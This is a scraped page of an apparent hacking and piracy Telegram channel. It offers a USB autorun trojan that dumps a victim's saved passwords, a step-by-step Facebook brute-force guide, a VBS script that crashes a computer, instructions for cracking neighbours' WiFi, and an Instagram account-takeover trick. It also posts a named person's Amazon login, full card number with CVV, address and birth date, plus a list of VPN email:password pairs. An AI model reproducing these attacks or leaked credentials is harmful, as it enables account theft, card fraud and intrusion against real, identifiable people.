DARK LAB


Channel's geo and language: not specified, not specified
Category: not specified


WEB🕸 ACCESS ⚜️PREMIUM ANDROID APPS Hubs ⚜️
💠Latest &Old PC SOFTWARE COLLECTION 🔵
⚔️MOD GAMES⚔️ , 💲FREE.EHI 📊🔑VPNS KEYS🗝 , 📥All Types PC GAMES Hubs 📥

➖➖➖➖➖➖➖➖➖➖➖➖
© All rights reserved 2020

Related channels

Channel's geo and language
not specified, not specified
Category
not specified
Statistics
Posts filter


Y'all wanna try and make a USB password stealer trojan try this✊✊✊✊
tutorial on how to make a USB stealer. Basically with a functional stealer you can plug it into any persons PC and steal all their saved passwords, etc.
No need for:
-Hosting
-Software
-Crypting

TUTORIAL:

open notepad/wordpad
type:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save this as AUTORUN.inf

open a new notepad/wordpad document
type:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext passwordfox.txt
start OperaPassView.exe /stext OperaPassView.txt
start ChromePass.exe /stext ChromePass.txt
start Dialupass.exe /stext Dialupass.txt
start netpass.exe /stext netpass.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start BulletsPassView.exe /stext BulletsPassView.txt
start VNCPassView.exe /stext VNCPassView.txt
start OpenedFilesView.exe /stext OpenedFilesView.txt
start ProduKey.exe /stext ProduKey.txt
start USBDeview.exe /stext USBDeview.txt
save this as LAUyou .bat

copy the autorun and launch file to your USB

go to http://www.nirsoft.net/ and download the programs named in step 2

extract the files you downloaded to your desktop and copy all the .exe files to your USB
remove and re-insert your USB

click on the option perform a virus scan
(this is an example, if you want it to say something else go to the autorun file and change it ;) )
go to my computer—-> USB DRIVE and open it
you will now see some text files, if you open them you will see usernames and passwords GB
NOTICE: this only recovers passwords that have once been saved on your computer

Thanks, and I hoped this helped!
@darkIab —————
exploits




🔰The Complete Deep Web Course Become An Expert!🔰

Contents :-

1. Welcome To The Complete Deep Web Course!
2. Introduction To The Deep Web
3. Setting Up The Environment
4. Hands On With The Deep Web
5. Deep Web Link Directories (A Huge Onion Link Collection)
6. Bitcoin & Cryptocurrency On The Deep Web
7. PGP Tutorial - Deep Web
8. How To Create And Host A Deep Web Website Onion Site
9. How To Access The Deep Web On Android


🔗Ad Free Download Link:- https://redhatsquad.com/the-complete-deep-web-course-become-an-expert/

@darkIab


⚠️Attention!

Hello dear members
it is our pleasure to have you with us!❤️

💥Please read here carefully!👇

⚠️Advertisements appearing on our channels are only advertisements and we do not have any Idea that they are real or fake.
We are not responsible for any scam, deal purchase made by you related to the advertisement.
Think wisely before making any deal if you lose money, we will not take any responsibility or compensate for any looses .

⚠️Deal at your own risk only⚠️
❌Dont Blame Anybody But Yourself❌

thank you all!🙏


+--------------------------[ AMAZON ACCOUNT ]-------------------------+
# AMAZON ACCOUNT : marijo_bo@hotmail.com
# PASSWORD : mar22ijo
+--------------------------[ CARD DETAILS ]-------------------------+
# BANK : ZAGREBACKA BANKA BH D.D.
# TYPE : VISA - DEBIT
# LEVEL : ELECTRON
# CARDHOLDERS : Marijo Bogoje
# CC NUMBER : 4655600475371750
# EXPIRED : 02/23
# CVV : 160
# AMEX CID :
# ACCOUNT NUMBER :
# SORT CODE :
# CREDIT LIMIT :
# FOR CHECK : 4655600475371750|02|23
+--------------------------[ JAPAN INFO ]-------------------------+
# WEB ID :
# CARD PASSWORD :
+--------------------------[ BILLING ADDRESS ]-------------------------+
# FULL NAME : Marijo Bogoje
# ADDRESS : Put od Cavtata 26B
# CITY : Cavtat
# STATE :
# COUNTRY : Croatia
# ZIP : 20210
# DOB : 07/07/1989
# PHONE : 0996760295
+--------------------------[ OTHER INFO ]-------------------------+
# ID NUMBER :
# CIVIL ID :
# QATAR ID :
# NATIONAL ID :
# CITIZEN ID :
# PASSPORT NUMBER :
# BANK ACCESS NUMBER :
# SOCIAL INSURANCE NUMBER :
# SOCIAL SECURITY NUMBER :
# OSID NUMBER :
+--------------------------[ PC INFO ]-------------------------+
# IP ADDRESS : 212.92.211.50
# ISP : Zagreb, Croatia
# REGION :
# CITY :
# CONTINENT : Europe
# TIMEZONE : Europe/Zagreb
# OS/BROWSER : Windows 10 / Chrome
# DATE : 12 Feb, 2020, Time : 9:29 pm
# USER AGENT : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36
@tech0hub
@darkIab


TO BECOME SUCCESSFUL YOU NEED TO DO THE FOLLOWING:

● BELIEVE – while others are doubting.
● PLAN – while others are playing.
● STUDY – while others are sleeping.
● DECIDE – while others are delaying.
● PREPARE – while others are daydreaming.
● BEGIN – while others are procrastinating.
● WORK – while others are wishing.
● INVEST – while others are wasting.
● LISTEN – while others are talking.
● SMILE – while others are frowning.
● COMMEND – while others are criticizing.
● PERSIST – while others are quitting.

Some of you just keep on looking as we post Earning a methods, and then you come to my inbox requesting for some Bitcoins. 😔😔😔😔😔😔

ANYWAY WE GO WITH THOSE WHO ARE QUICK LEARNERS. AS FOR THE DOUBTING THOMASES. YOUR ALSO WELCOME TO SPECTATE
@tech0hub
@darkIab
EXPLOITS


Forward from: Tech Hub 🖥
🔔 How To Find Open Ports Of Computer System 🔔

🌀To find open ports on a computer, you can use netstat command line.

🌀To display all open ports, open DOS command, type netstat and press Enter.

🌀To list all listening ports, use netstat -an |find /i “listening” command.

🌀To see what ports your computer actually communicates with, use netstat -an |find /i “established”

🌀To find specified open port, use find switch. For example, to find if the port 3389 is open or not, do netstat -an |find /i “3389”.

✨ You can use PULIST from the Windows Resource Kit to find which process is using a specified port. For example, pulist |find /i “4125” may display

Process PID User
mad.exe 4125 Chicagotech/blin

Share and Support ❤️


🔔 HOW TO HACK A FACEBOOK ACCOUNT 🔔


Requirements:
- Termux
- 200 MB space
- Facebook target link
- Info about target
- Root

Setup:
$ apt install nodejs -y

$ pkg install git tsu -y

$ apt install python python2 -y

$ apt update; apt upgrade -y

$ npm install --global facebook-id-of

1️⃣ Getting ID

The first what we need is the ID of the facebook user, this can be found out through the facebook-id-of tool, which we have installed.

On the target profile, we can see URL like this:
https://www.facebook.com/michael.schmidt.7965692 — Remove the hyperlink and copy online name after facebook.com/.

$ facebook-id-of michael.schmidt.7965692

› Facebook ID of michael.schmidt.7965692 is 671393100

2️⃣ Dumping Information About Target

For this, we're gonna using the tool OSIF, it's still working and helping us, to get some details.

$ pkg update upgrade

$ pkg install git python2

$ git clone https://github.com/ciku370/OSIF

$ cd OSIF

$ pip2 install -r requirements.txt

For this tool you need a working, non 2FA facebook account, which can be used for scanning our target. Brought to you by Hackfreaks official.(TARGET MUST EXIST IN FRIEND LIST)

$ python2 osif.py
D3b2y >> token
Type username (email) & Password.

D3b2y >> cat_token
[*]Your access token !!

Setup done now Hype

D3b2y >> dump_id
D3b3y >> dump_671393100

This fetching some informations about our target an example can be found here:

https://pastebin.com/10H7C22T

If you know your targets e-mail, it's much easier to attack them from the »bruteforce« tool.

D3b3y » dump_mail

Now on to creating a wordlist for bruteforcing

While people downloading random wordlists, creating wordlist with crunch and trying any other method with much effort, Brought to you by Hackfreaks official. we can easily generate a wordlist related to information about our victim. This method has helped me several times to get into an Instagram account.

$ git clone https://github.com/Mebus/cupp.git; cd cupp/

$ python3 cupp.py -i

After tool has been started, fill out the information which you have dumped with OSIF.
It's asking :
> Do you want to add some key words about the victim? Y/[N]: y

> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: football,blue,dog,maddisonschoolmarvelmovies,black,michaeljackson

> Do you want to add special chars at the end of words? Y/[N]: n

> Do you want to add some random numbers at the end of words? Y/[N]:y

> Leet mode? (i.e. leet = 1337) Y/[N]: y

$ cp -R test.txt $HOME

Choose same, if you need keyword put all keywords about target, if you target likes barcelona football club, type barcelona,football.
These keywords can be anything the victim likes. Mother's name, hobbies, favorite movies, food, color, sports, etc.

It's saved as name, as you used for the firstname. If you don't know partner, use any best friend information, there are few apps like tellonym.me, instagram.com, snapchat.com to fetch as much information as you need.

Bruteforcing the account

$ pkg install nano -y

$ git clone https://github.com/TunisianEagles/SocialBox.git; cd SocialBox; chmod +x *.sh

$ nano install-sb.sh

Edit all sudo lines, only remove sudo:
sudo apt-get update
After:
apt update

Exit — ctrl+x — y (yes) — enter.F-

$ ./install-sb.sh

$ cp -R $HOME/test.txt $PWD

$ ./SocialBox.sh

CP means we are copying our text file from cupp folder to home, then from home to the socialbox folder. Do it, you need in social a wordlist which has been created. If you don't want to copy it :

Choice > 1
Enter Facebook ID / Email / Username / Number: 671393100
Enter wordlist path : $HOME/cupp/test.txt

Now the Bruterforcer will start to read your password list, or the word list you specified, and then try to test the password in the background using YOUR IP address. I have also tried to crack a Facebook account a few times, please use a VPN!

Enjoy the Facebook accounts

❤ Support Y'all
@darkIab


Forward from: ᗪᴀƦҜ NᏋŦ ™
​​✿══════ ۞ 💫 ۞ ══════✿
Young💫Ştars🌟Promotions
✿══════ ۞ 💫 ۞ ══════✿
💥TRĘNDING🔥ÇHĄNNĘLŞ💥TODAY📡
✿══════ ۞ 💫 ۞ ══════✿
POWERED BY @youngstarsprom_bot
🦋
SPONSORED BY 💫 @youngstarspromo_bot 👑
✿══════ ۞ 💫 ۞ ══════✿
COURTESY OF 🛡️DĄRK🎭NĘT🔰
✹ ⃟ ▬▬▬▬▬▬▬▬▬▬▬▬ ⃟ ✹


🔥 Express VPN Hits 🔥

prasori@gmail.com:hope2009 jtodd14@email.tjc.edu:jackets73 kitty.ma.teach@gmail.com:laughter jhasselblad1@gmail.com:Quackshot5 saraheped@hotmail.com:Hersche1 tubbsmister@gmail.com:Catdog55 keroppii__.x@hotmail.com:Thunder




How to crash computer with only one click💪

1️⃣ open notepad
2️⃣ Copy this codes

Dim WSHSHELL
Set
Wshshell=wscript.creatobject("wscript.shell")

Dim x
For x = 1 to 100000000
Wshshell.run "tourstart.exe"

Next Save It As Anything.vbs


Don't Try this on your pc!!

:- Exploits




✔️Learn about bitcoin
✔️Free Bitcoin earning methods
✔️Expert trading 💹
✔️Bitcoin minner
✔️Perfect signals
✔️payment method
✔️Bitcoin, skril

We Guarantee You legitimacy

JOIN OUR TELEGRAM CHANNEL
👇👇👇👇👇👇👇👇

https://t.me/joinchat/AAAAAFcYA5EXAn41WSB1lg


🔰THINGS YOU CAN DO USING METASPOLIT FRAMEWORK🔰

🌀1. Pre-engagement interactions: This step defines all the pre-engagement activities and scope definitions, basically everything you need to discuss with the client before the testing starts.

🌀2. Intelligence gathering: This phase is all about collecting information about the target under test, by connecting to the target directly or passively, without connecting to the target at all.

🌀3. Threat modeling: This phase involves matching the information uncovered to the assets to find the areas with the highest threat level.

🌀4. Vulnerability analysis: This involves finding and identifying known and unknown vulnerabilities and validating them.

🌀5. Exploitation: This phase works on taking advantage of the vulnerabilities discovered in the previous phase. This typically means that we are trying to gain access to the target.

🌀6. Post-exploitation: The actual tasks to perform at the target, which involve downloading a file, shutting a system down, creating a new user account on the target, and so on, are parts of this phase. This phase describes what you need to do after exploitation.

🌀7. Reporting: This phase includes summing up the results of the test in a file and the possible suggestions and recommendations to fix the current weaknesses in the target.

🔺 Inquiries pass through ;
@Techhubsupportbot




virus prevention for any Linux platform :


(1) Do a good job in system reinforcement.

(2) Pay attention to security announcements and correct loopholes in time.

(3) Do not use root privileges for daily operations.

(4) Don't just install various device drivers from unknown sources.

(5) Do not run some executable programs or scripts of unknown origin on important servers.

(6) Install anti-virus software as much as possible, and regularly upgrade the virus code base.

(7) For Linux servers connected to the Internet, Linux viruses should be checked regularly. Whether worms and Trojan horses exist.

(8) For Linux servers that provide file services, it is best to deploy a software that can check and kill Windows and Linux viruses at the same time.

(9) For Linux servers that provide mail services, it is best to use an E-mail virus scanner.
@darkIab
@tech0hub


How to вypaѕѕ ѕυѕpιcιoυѕ logιn ғor ιnѕтagraм

ѕтepѕ

1 eмaιl ιnѕтagraм nd тell тнeм υ ғorgoт yoυr eмaιl, gιve тнeм yoυr @. тнey wιll reѕpond wιтн тнe eмaιl ѕнorтly

2 тry тo geт тнe eмaιl тaĸen down вy ѕpaммιng ιт.

3 eмaιl ιnѕтagraм nd тell тнeм тнaт υ cannoт verιғy yoυr code вcoz yoυr eмaιl ιѕ тaĸen down.

4 υ wιll geт a reѕponѕe wιтн a lιnĸ тo cнange yoυr eмaιl.

nв> тнιѕ enтιre proceѕѕ wιll тaĸe 1-3 dayѕ


Forward from: ᗪᴀƦҜ NᏋŦ ™
✿══════ ۞ 💫 ۞ ══════✿
Young💫Ştars🌟Promotions
✿══════ ۞ 💫 ۞ ══════✿
💥TRĘNDING🔥ÇHĄNNĘLŞ💥TODAY📡
✿══════ ۞ 💫 ۞ ══════✿
POWERED BY @youngstarsprom_bot
🦋
SPONSORED BY 💫 @darkn3tpromo_bot 👑
✿══════ ۞ 💫 ۞ ══════✿
COURTESY OF 🛡️DĄRK🎭NĘT🔰
▭▬▭▬▭▬▭▬▭▬▭▬▭▬
INTERNET/VPNS/ACCOUNTS
➖➖➖➖➖➖➖➖➖➖
@Darkn3t1 🎭
@Tech0hub 🛡
@darklab
@techwizardsnest 🧙‍♂️
@freevipapk 🔩
@techbuzzz
@psiphonproxy2 🔰
@psiphonproxychallange 👌
✹ ⃟ ▬▬▬▬▬▬▬▬▬▬▬▬ ⃟ ✹
⚡👊MOVIES/SERIES🔥
➖➖➖➖➖➖➖➖➖➖
@rodneyxerxes 🎬
✹ ⃟ ▬▬▬▬▬▬▬▬▬▬▬▬ ⃟ ✹
⚡👊DATA PACKAGES🔥
➖➖➖➖➖➖➖➖➖➖
@bundles254 🎩
✹ ⃟ ▬▬▬▬▬▬▬▬▬▬▬▬ ⃟ ✹
⚡👊GAMES 🔥
➖➖➖➖➖➖➖➖➖➖
@salahkellii 🎮
✹ ⃟ ▬▬▬▬▬▬▬▬▬▬▬▬ ⃟ ✹
⚡👊LIFE STYLE💃
➖➖➖➖➖➖➖➖➖➖
@Drapthoughts 👑
@findinghumanity 👼
@FACTS0000 💪
@ggwp99lvl 🥀
@realobsession 💃
@factforlife
@Osirs 🍁
✹ ⃟ ▬▬▬▬▬▬▬▬▬▬▬▬ ⃟ ✹
⚡👊MUSIC 🔥
➖➖➖➖➖➖➖➖➖➖
@Traphub01 🎼
@apna_bihar 🎤
@vybz_kartel 🎧
@nairobian_drip 🎼
✹ ⃟ ▬▬▬▬▬▬▬▬▬▬▬▬ ⃟ ✹
👊⚡MEMES 🔥
➖➖➖➖➖➖➖➖➖➖
@unruly254 😜
@demorahub 🤪
✹ ⃟ ▬▬▬▬▬▬▬▬▬▬▬▬ ⃟ ✹
- - - - - - - - - - - - - - - - - - - - - - - -
Auto delete 24 HOURS IN CHANNEL📡
- - - - - - - - - - - - - - - - - - - - - - - -
ADD YOUR CHANNEL/GROUP ON THIS LIST FOR FREE
CLICK THE ADD CHANNEL/GROUP BUTTON BELLOW
✹ ⃟ ▬▬▬▬▬▬▬▬▬▬▬▬ ⃟ ✹


🔔 NO WIFI? HACK YOUR NEIGHBORS WIFI WITH ONLY YOUR PHONE 🔔

Proceed only if your device falls under either of the below categories. Otherwise, it is waste of time and energy. For better results use Cyanogen ROM.
Android Device should be rooted.
Android Device should support bcmon App (i.e should have Broadcom bcm4329/4330 wifi chipset. [OR]
[Update] Now ‘non bcmon supported devices’ & ‘devices which support external WiFi cards’ can also be used to hack WiFi.
Tools Used:
bcmon app[apk] -This tool enables Monitor Mode on your rooted device with Broadcom chipset, which is essential for hacking WiFi using android. Download
Reaver for Android or RfA – A WiFi pentesting tool which can be used to attack WPS-enabled routers and after the WPS-Pin is cracked, it can retrieve the actual WPA-key.
Hacking WPA/WPA2 (WPS Enabled) WiFi using Android [bcmon supported devices]
Download and install the bcmon app.
Run bcmon. It may crash at first but keep trying. If it still crashes after 3-4 attempts the device may not be supported.
Install the firmware and tools, as prompted. Click on ‘enable monitor mode‘.
Download and install Reaver and run it.
Reaver will scan for the available access point. Remember it can hack only WPS enabled WiFi. Make sure Monitor Mode’ is turned on. Make sure that the “Automatic advanced settings” box is checked.
Choose the network to hack and tap “Start Attack“. It will take between 2-10 hours to hack. And sometimes it will never e successful depending on the router type.
Hacking WEP type WiFi Using Android Phone
WEP is an outdated, weak protweak protocolto secure WiFi and it is no more preferred because it can be hacked within seconds. However due to lack of awareness it is still used across the world. Below instructions explain how you can use you android device to hack a WEP protected WiFi network.
Procedure
bcmon app is used here also. So download and install it as told above
Tap “Run bcmon terminal“. This will launch a terminal similar to most Linux terminals.
Type airodump-ng and tap the Enter button. In the newly opened window type airodump-ng wlan0 and tap the Enter button.
Open reaver and note down the WiFi (Access point) name, Mac Address and the broadcasting channel of the WiFi which you want to hack. Make sure it is WEP.
Now we can start scanning the target WiFi and collect packets. Type the following
airodump-ng -c channe –bssid MAC address -w outputfile ath0
Note: channe = broadcasting channel, MAC address = Mac Address of the router which you already noted down. -w is for specifying the output file name. I have given outputfile in the example. So the complete command look similar to this.
airodump-ng -c 9 –bssid 00:14:6C:7E:40:80 -w outputfile ath0
Continue scanning untill it collects 20,000-30,000 packets.
Once enough packets are collected return to the terminal and type aircrack-ng outputfile*.cap and tap Enter. Aircrack program will attempt to crack the WiFi password from the extracted packets.
It might take hours to crack. Finally a message Key Found! will appear, followed by the key in hexadecimal form. Key will work only if Probability” is 100%.
Remove “:” from the key. i.e if it is 19:04:56:77:94, the key would be 1904567794

😌@darkIab
😌@tech0hub

20 last posts shown.

277

subscribers
Channel statistics